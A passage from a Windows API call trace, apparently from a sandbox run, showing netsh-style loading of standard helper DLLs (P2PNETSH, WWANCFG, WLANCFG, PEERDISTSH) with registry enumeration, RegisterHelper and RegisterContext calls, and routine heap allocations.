GetProcessHeap () returned 0x250000 [0166.814] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x296fd0 | out: hHeap=0x250000) returned 1 [0166.814] LoadLibraryW (lpLibFileName="WCNNETSH.DLL") returned 0x7fef2680000 [0169.789] GetProcAddress (hModule=0x7fef2680000, lpProcName="InitHelperDll") returned 0x7fef26828e4 [0169.789] InitHelperDll () returned 0x0 [0169.790] RegisterHelper () returned 0x0 [0169.790] GetProcessHeap () returned 0x250000 [0169.790] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xdc0) returned 0x2a4e60 [0169.790] GetProcessHeap () returned 0x250000 [0169.790] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2a2610 | out: hHeap=0x250000) returned 1 [0169.790] RegEnumValueW (in: hKey=0x90, dwIndex=0x11, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="p2pnetsh", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0169.790] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0169.790] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0169.790] GetProcessHeap () returned 0x250000 [0169.790] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2f8) returned 0x296fd0 [0169.790] GetProcessHeap () returned 0x250000 [0169.790] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x28e630 [0169.790] GetProcessHeap () returned 0x250000 [0169.791] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1a) returned 0x2a3960 [0169.791] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0169.791] GetProcessHeap () returned 0x250000 [0169.791] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2a3380 | out: hHeap=0x250000) returned 1 [0169.791] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x7fef2650000 [0175.233] GetProcAddress (hModule=0x7fef2650000, lpProcName="InitHelperDll") returned 0x7fef2655568 [0175.233] InitHelperDll () returned 0x0 [0175.233] RegisterHelper () returned 0x0 [0175.233] GetProcessHeap () returned 0x250000 [0175.233] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe18) returned 0x2aae50 [0175.233] GetProcessHeap () returned 0x250000 [0175.233] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2a4e60 | out: hHeap=0x250000) returned 1 [0175.233] RegisterHelper () returned 0x0 [0175.233] GetProcessHeap () returned 0x250000 [0175.233] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe70) returned 0x2abc70 [0175.234] GetProcessHeap () returned 0x250000 [0175.234] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2aae50 | out: hHeap=0x250000) returned 1 [0175.234] RegisterHelper () returned 0x0 [0175.234] GetProcessHeap () returned 0x250000 [0175.234] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xec8) returned 0x2acaf0 [0175.234] GetProcessHeap () returned 0x250000 [0175.234] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2abc70 | out: hHeap=0x250000) returned 1 [0175.234] RegisterHelper () returned 0x0 [0175.234] GetProcessHeap () returned 0x250000 [0175.234] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xf20) returned 0x2aae50 [0175.234] GetProcessHeap () returned 0x250000 [0175.234] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2acaf0 | out: hHeap=0x250000) returned 1 [0175.234] RegisterHelper () returned 0x0 [0175.234] GetProcessHeap () returned 0x250000 [0175.234] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xf78) returned 0x2abd80 [0175.234] GetProcessHeap () returned 0x250000 [0175.234] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2aae50 | out: hHeap=0x250000) returned 1 [0175.235] RegisterHelper () returned 0x0 [0175.235] GetProcessHeap () returned 0x250000 [0175.235] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xfd0) returned 0x2acd00 [0175.235] GetProcessHeap () returned 0x250000 [0175.235] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2abd80 | out: hHeap=0x250000) returned 1 [0175.235] RegisterHelper () returned 0x0 [0175.235] GetProcessHeap () returned 0x250000 [0175.235] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1028) returned 0x2aae50 [0175.235] GetProcessHeap () returned 0x250000 [0175.235] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2acd00 | out: hHeap=0x250000) returned 1 [0175.235] RegisterHelper () returned 0x0 [0175.235] GetProcessHeap () returned 0x250000 [0175.235] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1080) returned 0x2abe80 [0175.235] GetProcessHeap () returned 0x250000 [0175.235] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2aae50 | out: hHeap=0x250000) returned 1 [0175.235] RegisterHelper () returned 0x0 [0175.235] GetProcessHeap () returned 0x250000 [0175.235] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10d8) returned 0x2acf10 [0175.235] GetProcessHeap () returned 0x250000 [0175.236] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2abe80 | out: hHeap=0x250000) returned 1 [0175.236] RegisterHelper () returned 0x0 [0175.236] GetProcessHeap () returned 0x250000 [0175.236] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1130) returned 0x2adff0 [0175.236] GetProcessHeap () returned 0x250000 [0175.236] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2acf10 | out: hHeap=0x250000) returned 1 [0175.236] RegEnumValueW (in: hKey=0x90, dwIndex=0x12, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="wwancfg", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0175.236] _wcsicmp (_String1="wwancfg.dll", _String2="ipxmontr.dll") returned 14 [0175.236] _wcsicmp (_String1="wwancfg.dll", _String2="ipxpromn.dll") returned 14 [0175.236] GetProcessHeap () returned 0x250000 [0175.236] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x320) returned 0x29d140 [0175.236] GetProcessHeap () returned 0x250000 [0175.236] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x28e690 [0175.236] GetProcessHeap () returned 0x250000 [0175.236] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x28e670 [0175.236] _wcsupr (in: _String="wwancfg.dll" | out: _String="WWANCFG.DLL") returned="WWANCFG.DLL" [0175.236] GetProcessHeap () returned 0x250000 [0175.236] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x296fd0 | out: hHeap=0x250000) returned 1 [0175.236] LoadLibraryW (lpLibFileName="WWANCFG.DLL") returned 0x7fef2550000 [0176.657] GetProcAddress (hModule=0x7fef2550000, lpProcName="InitHelperDll") returned 0x7fef25520c8 [0176.657] InitHelperDll () returned 0x0 [0176.657] RegisterHelper () returned 0x0 [0176.657] GetProcessHeap () returned 0x250000 [0176.657] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1188) returned 0x2aae50 [0176.657] GetProcessHeap () returned 0x250000 [0176.657] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2adff0 | out: hHeap=0x250000) returned 1 [0176.657] RegEnumValueW (in: hKey=0x90, dwIndex=0x13, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="wlancfg", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0176.657] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0176.657] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0176.657] GetProcessHeap () returned 0x250000 [0176.657] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x348) returned 0x2a4e60 [0176.657] GetProcessHeap () returned 0x250000 [0176.657] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x297970 [0176.657] GetProcessHeap () returned 0x250000 [0176.657] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2979b0 [0176.658] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0176.658] GetProcessHeap () returned 0x250000 [0176.658] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29d140 | out: hHeap=0x250000) returned 1 [0176.658] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x7fef2520000 [0177.644] GetProcAddress (hModule=0x7fef2520000, lpProcName="InitHelperDll") returned 0x7fef252613c [0177.644] InitHelperDll () returned 0x0 [0177.644] RegisterHelper () returned 0x0 [0177.644] GetProcessHeap () returned 0x250000 [0177.644] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x11e0) returned 0x2acfe0 [0177.644] GetProcessHeap () returned 0x250000 [0177.644] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2aae50 | out: hHeap=0x250000) returned 1 [0177.645] RegEnumValueW (in: hKey=0x90, dwIndex=0x14, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="peerdistsh", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0177.645] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0177.645] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0177.645] GetProcessHeap () returned 0x250000 [0177.645] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x370) returned 0x2a51b0 [0177.645] GetProcessHeap () returned 0x250000 [0177.645] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x16) returned 0x2979d0 [0177.645] GetProcessHeap () returned 0x250000 [0177.645] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1e) returned 0x2a2fa0 [0177.645] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0177.645] GetProcessHeap () returned 0x250000 [0177.645] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2a4e60 | out: hHeap=0x250000) returned 1 [0177.645] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x7fef50b0000 [0180.107] GetProcAddress (hModule=0x7fef50b0000, lpProcName="InitHelperDll") returned 0x7fef512e69c [0180.107] InitHelperDll () returned 0x0 [0180.334] RegisterHelper () returned 0x0 [0180.334] GetProcessHeap () returned 0x250000 [0180.334] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1238) returned 0x2ae1d0 [0180.334] GetProcessHeap () returned 0x250000 [0180.334] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2acfe0 | out: hHeap=0x250000) returned 1 [0180.334] RegisterHelper () returned 0x0 [0180.334] GetProcessHeap () returned 0x250000 [0180.334] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1290) returned 0x2af410 [0180.334] GetProcessHeap () returned 0x250000 [0180.334] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ae1d0 | out: hHeap=0x250000) returned 1 [0180.334] RegCloseKey (hKey=0x90) returned 0x0 [0180.335] GetProcessHeap () returned 0x250000 [0180.335] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272310 | out: hHeap=0x250000) returned 1 [0180.335] GetProcessHeap () returned 0x250000 [0180.335] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26e060 | out: hHeap=0x250000) returned 1 [0180.336] GetProcessHeap () returned 0x250000 [0180.336] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c000 [0180.336] GetProcessHeap () returned 0x250000 [0180.336] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0180.336] RegisterContext () returned 0x0 [0180.338] GetProcessHeap () returned 0x250000 [0180.338] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c080 [0180.338] GetProcessHeap () returned 0x250000 [0180.338] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0181.044] RegisterContext () returned 0x0 [0181.045] GetProcessHeap () returned 0x250000 [0181.045] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c100 [0181.045] GetProcessHeap () returned 0x250000 [0181.045] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0181.045] RegisterContext () returned 0x0 [0181.045] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0181.045] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0181.045] GetProcessHeap () returned 0x250000 [0181.045] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe0) returned 0x29a4d0 [0181.045] GetProcessHeap () returned 0x250000 [0181.046] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c100 | out: hHeap=0x250000) returned 1 [0181.046] RegisterContext () returned 0x0 [0181.047] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0181.047] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0181.047] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0181.047] GetProcessHeap () returned 0x250000 [0181.047] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x150) returned 0x29d880 [0181.047] GetProcessHeap () returned 0x250000 [0181.047] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29a4d0 | out: hHeap=0x250000) returned 1 [0181.047] RegisterContext () returned 0x0 [0181.048] GetProcessHeap () returned 0x250000 [0181.048] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1c0) returned 0x2ab090 [0181.048] GetProcessHeap () returned 0x250000 [0181.048] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29d880 | out: hHeap=0x250000) returned 1 [0181.049] RegisterContext () returned 0x0 [0181.049] GetProcessHeap () returned 0x250000 [0181.049] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe0) returned 0x29a4d0 [0181.049] GetProcessHeap () returned 0x250000 [0181.049] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c080 | out: hHeap=0x250000) returned 1 [0181.049] RegisterContext () returned 0x0 [0181.049] GetProcessHeap () returned 0x250000 [0181.049] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x150) returned 0x29d880 [0181.049] GetProcessHeap () returned 0x250000 [0181.049] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29a4d0 | out: hHeap=0x250000) returned 1 [0181.049] RegisterContext () returned 0x0 [0181.049] GetProcessHeap () returned 0x250000 [0181.050] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1c0) returned 0x2ab4e0 [0181.050] GetProcessHeap () returned 0x250000 [0181.050] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29d880 | out: hHeap=0x250000) returned 1 [0181.050] RegisterContext () returned 0x0 [0181.050] GetProcessHeap () returned 0x250000 [0181.050] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x230) returned 0x2ab6b0 [0181.050] GetProcessHeap () returned 0x250000 [0181.050] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab4e0 | out: hHeap=0x250000) returned 1 [0181.924] RegisterContext () returned 0x0 [0181.924] GetProcessHeap () returned 0x250000 [0181.924] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2a0) returned 0x2ab8f0 [0181.924] GetProcessHeap () returned 0x250000 [0181.925] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab6b0 | out: hHeap=0x250000) returned 1 [0181.925] RegisterContext () returned 0x0 [0181.925] GetProcessHeap () returned 0x250000 [0181.925] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x310) returned 0x2ab4e0 [0181.925] GetProcessHeap () returned 0x250000 [0181.925] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab8f0 | out: hHeap=0x250000) returned 1 [0181.925] RegisterContext () returned 0x0 [0181.925] GetProcessHeap () returned 0x250000 [0181.925] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c080 [0181.925] GetProcessHeap () returned 0x250000 [0181.925] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0181.925] RegisterContext () returned 0x0 [0181.925] GetProcessHeap () returned 0x250000 [0181.925] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe0) returned 0x29a4d0 [0181.926] GetProcessHeap () returned 0x250000 [0181.926] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c080 | out: hHeap=0x250000) returned 1 [0181.926] RegisterContext () returned 0x0 [0181.926] GetProcessHeap () returned 0x250000 [0181.926] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x150) returned 0x29d880 [0181.926] GetProcessHeap () returned 0x250000 [0181.926] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29a4d0 | out: hHeap=0x250000) returned 1 [0181.926] RegisterContext () returned 0x0 [0181.926] GetProcessHeap () returned 0x250000 [0181.926] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1c0) returned 0x2ab800 [0181.926] GetProcessHeap () returned 0x250000 [0181.926] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29d880 | out: hHeap=0x250000) returned 1 [0181.926] RegisterContext () returned 0x0 [0181.926] GetProcessHeap () returned 0x250000 [0181.926] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x380) returned 0x2ab9d0 [0181.926] GetProcessHeap () returned 0x250000 [0181.926] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab4e0 | out: hHeap=0x250000) returned 1 [0181.926] RegisterContext () returned 0x0 [0181.927] GetProcessHeap () returned 0x250000 [0181.927] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x3f0) returned 0x2b6340 [0181.927] GetProcessHeap () returned 0x250000 [0181.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab9d0 | out: hHeap=0x250000) returned 1 [0181.927] RegisterContext () returned 0x0 [0181.927] GetProcessHeap () returned 0x250000 [0181.927] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x460) returned 0x2ab9d0 [0181.927] GetProcessHeap () returned 0x250000 [0181.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2b6340 | out: hHeap=0x250000) returned 1 [0181.927] RegisterContext () returned 0x0 [0181.927] GetProcessHeap () returned 0x250000 [0181.927] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x4d0) returned 0x2b6340 [0181.927] GetProcessHeap () returned 0x250000 [0181.927] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab9d0 | out: hHeap=0x250000) returned 1 [0181.927] RegisterContext () returned 0x0 [0181.927] GetProcessHeap () returned 0x250000 [0181.927] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c080 [0181.928] GetProcessHeap () returned 0x250000 [0181.928] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0181.928] RegisterContext () returned 0x0 [0181.928] GetProcessHeap () returned 0x250000 [0181.928] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe0) returned 0x29a4d0 [0181.928] GetProcessHeap () returned 0x250000 [0181.928] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c080 | out: hHeap=0x250000) returned 1 [0181.928] RegisterContext () returned 0x0 [0181.928] GetProcessHeap () returned 0x250000 [0181.928] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x150) returned 0x29d880 [0181.928] GetProcessHeap () returned 0x250000 [0181.928] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29a4d0 | out: hHeap=0x250000) returned 1 [0181.928] RegisterContext () returned 0x0 [0181.928] GetProcessHeap () returned 0x250000 [0181.928] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1c0) returned 0x2ab4e0 [0181.928] GetProcessHeap () returned 0x250000 [0181.928] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29d880 | out: hHeap=0x250000) returned 1 [0181.928] RegisterContext () returned 0x0 [0181.928] GetProcessHeap () returned 0x250000 [0181.928] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x230) returned 0x2ab9d0 [0181.928] GetProcessHeap () returned 0x250000 [0181.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab4e0 | out: hHeap=0x250000) returned 1 [0181.929] RegisterContext () returned 0x0 [0181.929] GetProcessHeap () returned 0x250000 [0181.929] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2a0) returned 0x2ab4e0 [0181.929] GetProcessHeap () returned 0x250000 [0181.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab9d0 | out: hHeap=0x250000) returned 1 [0181.929] RegisterContext () returned 0x0 [0181.929] GetProcessHeap () returned 0x250000 [0181.929] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c080 [0181.929] GetProcessHeap () returned 0x250000 [0181.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0181.929] RegisterContext () returned 0x0 [0181.929] GetProcessHeap () returned 0x250000 [0181.929] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe0) returned 0x29a4d0 [0181.929] GetProcessHeap () returned 0x250000 [0181.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c080 | out: hHeap=0x250000) returned 1 [0181.929] RegisterContext () returned 0x0 [0181.929] RegisterContext () returned 0x0 [0181.929] GetProcessHeap () returned 0x250000 [0181.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x310) returned 0x2ab9d0 [0181.930] GetProcessHeap () returned 0x250000 [0181.930] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab4e0 | out: hHeap=0x250000) returned 1 [0181.930] RegisterContext () returned 0x0 [0181.930] GetProcessHeap () returned 0x250000 [0181.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x380) returned 0x2b6820 [0181.930] GetProcessHeap () returned 0x250000 [0181.930] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab9d0 | out: hHeap=0x250000) returned 1 [0181.930] RegisterContext () returned 0x0 [0181.930] GetProcessHeap () returned 0x250000 [0181.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x540) returned 0x2ab9d0 [0181.930] GetProcessHeap () returned 0x250000 [0181.930] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2b6340 | out: hHeap=0x250000) returned 1 [0181.930] RegisterContext () returned 0x0 [0181.930] GetProcessHeap () returned 0x250000 [0181.930] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x5b0) returned 0x2b6bb0 [0181.930] GetProcessHeap () returned 0x250000 [0181.930] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2ab9d0 | out: hHeap=0x250000) returned 1 [0181.930] RegisterContext () returned 0x0 [0181.930] GetProcessHeap () returned 0x250000 [0181.931] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x620) returned 0x2b7170 [0181.931] GetProcessHeap () returned 0x250000 [0181.931] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2b6bb0 | out: hHeap=0x250000) returned 1 [0181.931] RegisterContext () returned 0x0 [0181.931] GetProcessHeap () returned 0x250000 [0181.931] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c080 [0181.931] GetProcessHeap () returned 0x250000 [0181.931] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0181.931] RegisterContext () returned 0x0 [0181.931] GetProcessHeap () returned 0x250000 [0181.931] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x690) returned 0x2b77a0 [0181.931] GetProcessHeap () returned 0x250000 [0181.931] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2b7170 | out: hHeap=0x250000) returned 1 [0181.950] RegisterContext () returned 0x0 [0181.950] GetProcessHeap () returned 0x250000 [0181.950] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x700) returned 0x2bf7e0 [0181.950] GetProcessHeap () returned 0x250000 [0181.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2b77a0 | out: hHeap=0x250000) returned 1 [0183.740] RegisterContext () returned 0x0 [0183.741] GetProcessHeap () returned 0x250000 [0183.741] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c480 [0183.741] GetProcessHeap () returned 0x250000 [0183.741] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0183.748] RegisterContext () returned 0x0 [0183.748] GetProcessHeap () returned 0x250000 [0183.748] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe0) returned 0x29aa70 [0183.748] GetProcessHeap () returned 0x250000 [0183.748] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c480 | out: hHeap=0x250000) returned 1 [0183.748] RegisterContext () returned 0x0 [0183.748] GetProcessHeap () returned 0x250000 [0183.748] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x770) returned 0x2d7740 [0183.748] GetProcessHeap () returned 0x250000 [0183.748] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2bf7e0 | out: hHeap=0x250000) returned 1 [0183.748] RegisterContext () returned 0x0 [0183.748] GetProcessHeap () returned 0x250000 [0183.748] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c480 [0183.748] GetProcessHeap () returned 0x250000 [0183.748] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0183.749] RegisterContext () returned 0x0 [0183.749] GetProcessHeap () returned 0x250000 [0183.749] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe0) returned 0x29ab60 [0183.749] GetProcessHeap () returned 0x250000 [0183.749] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c480 | out: hHeap=0x250000) returned 1 [0183.749] RegisterContext () returned 0x0 [0183.749] RegisterContext () returned 0x0 [0183.749] RegisterContext () returned 0x0 [0183.750] GetProcessHeap () returned 0x250000 [0183.750] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x7e0) returned 0x2d7ec0 [0183.751] GetProcessHeap () returned 0x250000 [0183.751] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d7740 | out: hHeap=0x250000) returned 1 [0183.752] RegisterContext () returned 0x0 [0183.752] GetProcessHeap () returned 0x250000 [0183.752] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x850) returned 0x2d86b0 [0183.752] GetProcessHeap () returned 0x250000 [0183.752] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d7ec0 | out: hHeap=0x250000) returned 1 [0183.753] RegisterContext () returned 0x0 [0183.753] GetProcessHeap () returned 0x250000 [0183.753] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8c0) returned 0x2d7740 [0183.753] GetProcessHeap () returned 0x250000 [0183.753] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d86b0 | out: hHeap=0x250000) returned 1 [0183.753] RegisterContext () returned 0x0 [0183.753] GetProcessHeap () returned 0x250000 [0183.753] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c480 [0183.753] GetProcessHeap () returned 0x250000 [0183.753] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0183.758] RegisterContext () returned 0x0 [0183.758] GetProcessHeap () returned 0x250000 [0183.758] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe0) returned 0x29ad60 [0183.758] GetProcessHeap () returned 0x250000 [0183.758] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c480 | out: hHeap=0x250000) returned 1 [0183.758] RegisterContext () returned 0x0 [0183.758] GetProcessHeap () returned 0x250000 